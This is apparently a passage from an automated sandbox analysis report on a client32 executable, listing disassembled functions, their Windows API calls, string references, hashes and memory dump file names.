                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy
                                                                                                                                                                • String ID: 1000,50$1000,50
                                                                                                                                                                • API String ID: 2961919466-2776873633
                                                                                                                                                                • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                                                                                • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                                                                                                • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                                                                                • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                                                                                                Function 1110F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                                                                                • API String ID: 2400454052-4183089485
                                                                                                                                                                • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                                                                                • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                                                                                                • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                                                                                • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
                                                                                                                                                                Function 11153500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 11153524
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115350E
                                                                                                                                                                • m_hWnd, xrefs: 11153513
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 67735064-2830328467
                                                                                                                                                                • Opcode ID: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                                                                                                • Instruction ID: 41066489dfbac7b1bedb0840a1a625780406ac6dbed52086b597086e3eac16ab
                                                                                                                                                                • Opcode Fuzzy Hash: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                                                                                                • Instruction Fuzzy Hash: 5FD022B5B69229ABC31096A1EC84FC1B3849B0832CF011834F03553400E660B8C08341
                                                                                                                                                                Function 1100D770 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111ECE2C,00000000,?,?,1100C13B,00000000,00000000), ref: 1100D77F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111ECE2C,?,?,1100C13B,00000000,00000000), ref: 1100D7F0
                                                                                                                                                                  • Part of subcall function 1100D6E0: EnterCriticalSection.KERNEL32(111ECE2C,1100CA4A,?,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D6E9
                                                                                                                                                                  • Part of subcall function 1100D6E0: LeaveCriticalSection.KERNEL32(111ECE2C,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D761
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111ECE2C), ref: 1100D7BF
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111ECE2C), ref: 1100D7DB
                                                                                                                                                                  • Part of subcall function 1100D690: EnterCriticalSection.KERNEL32(111ECE2C,1100C3CB), ref: 1100D695
                                                                                                                                                                  • Part of subcall function 1100D690: LeaveCriticalSection.KERNEL32(111ECE2C), ref: 1100D6CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                • Opcode ID: 814b6c6d370acaf2a60d7adc16ec1fb1b49ba5a5cd7674d308ab0b87800441f2
                                                                                                                                                                • Instruction ID: 08a2a681f85b9e6f908ed91d35112c8f73428e95198a676c648ef119a840dcee
                                                                                                                                                                • Opcode Fuzzy Hash: 814b6c6d370acaf2a60d7adc16ec1fb1b49ba5a5cd7674d308ab0b87800441f2
                                                                                                                                                                • Instruction Fuzzy Hash: E601713AE122385BE705DBF4DC49B9DFBA8EB0CA95B0001A5FC1CD3200E670AD0087E1